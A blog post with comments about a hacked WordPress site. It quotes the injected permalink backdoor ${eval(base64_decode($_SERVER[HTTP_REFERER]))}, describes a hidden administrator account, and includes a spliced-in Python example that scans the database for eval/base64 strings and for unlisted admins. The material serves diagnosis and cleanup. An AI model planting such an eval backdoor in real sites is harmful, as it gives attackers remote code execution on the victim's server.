eval(base64_decode(…)) in permalinks

I figure my blog got hacked. It’s my own fault for being too lazy to upgrade, but I thought I’d describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

Since this morning, I noticed that my “permalinks” setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called “JohnFisher76” also had admin rights. I’d had a few spam registrations before so I hadn’t paid attention to this. I wish I had…

I haven’t bothered to try and interpret what this does, but I guess it’s used to hide the fact that there is another administrator in the admin panel. I don’t know how this user managed to acquire admin rights though.

Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that’s fixed it. I hope this thing hasn’t left anything else behind that could come back to haunt me…

I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don’t think that had any effect.

At any rate it can’t hurt to search the “options” table for any reference to “eval” or “base64” and clean that up. It also appeared in a row in “options” called “rewrite_rules”, I think. But that disappeared once I changed the setting back.

As I said, I don’t know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.
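The two checks described above, searching the options table for “eval”/“base64” and confirming who really holds administrator rights straight from the database, as an added example that is not part of the original post or its comments. It assumes the default wp_ table prefix and runs against constructed sample rows in an in-memory SQLite copy of the tables.

```python
import re
import sqlite3

# Constructed sample rows mirroring WordPress's wp_options, wp_users and
# wp_usermeta tables (default "wp_" table prefix assumed). The injected
# permalink value is the one quoted in the post; the user names are made up.
SAMPLE_OPTIONS = [
    ("siteurl", "http://example.invalid"),
    ("permalink_structure",
     "/%year%/%postname%/${eval(base64_decode($_SERVER[HTTP_REFERER]))}"),
    ("rewrite_rules", 'a:1:{s:3:"foo";s:23:"eval(base64_decode($x))";}'),
]
SAMPLE_USERS = [(1, "owner"), (2, "spammer1"), (3, "JohnFisher76")]
SAMPLE_USERMETA = [  # PHP-serialized capability arrays, as WordPress stores them
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),  # the hidden admin
]

# eval(...) and base64_decode have no business in any WordPress option value
SUSPICIOUS = re.compile(r"eval\s*\(|base64_decode", re.IGNORECASE)

def load_sample_db():
    """Build an in-memory SQLite copy of the three tables holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_options VALUES (?, ?)", SAMPLE_OPTIONS)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", SAMPLE_USERMETA)
    return conn

def find_suspicious_options(conn):
    """Return (option_name, option_value) pairs whose value matches SUSPICIOUS."""
    rows = conn.execute("SELECT option_name, option_value FROM wp_options")
    return [(name, value) for name, value in rows if SUSPICIOUS.search(value or "")]

def find_administrators(conn):
    """Every (ID, login) granted 'administrator' in wp_capabilities, read straight from the tables."""
    rows = conn.execute(
        "SELECT u.ID, u.user_login FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%\"administrator\"%'")
    return sorted(rows)

if __name__ == "__main__":
    db = load_sample_db()
    print(find_suspicious_options(db), find_administrators(db))
```

Against a live site, swap load_sample_db() for a connection to the real database; the two SELECT statements are plain SQL that MySQL accepts unchanged, and any login the second one returns that the admin panel does not show is exactly the hidden account described in the post.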

My site got nailed too. I didn’t think of anything when I had a couple “admin” users added to the site. Thought it was just spam. But I had two additional “admins” with “contributor” status and they were able to change the Permalinks URL structure. Argghh.

We also offer a free WP security plugin, to lock down all versions of WordPress. This works in 98% of the cases (download here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ) – however in this case, if you are hosted with GoDaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution) – the plugin wouldn’t help much.

The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent “in the clear” via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you’re on a PC or Cyberduck if you’re on a Mac.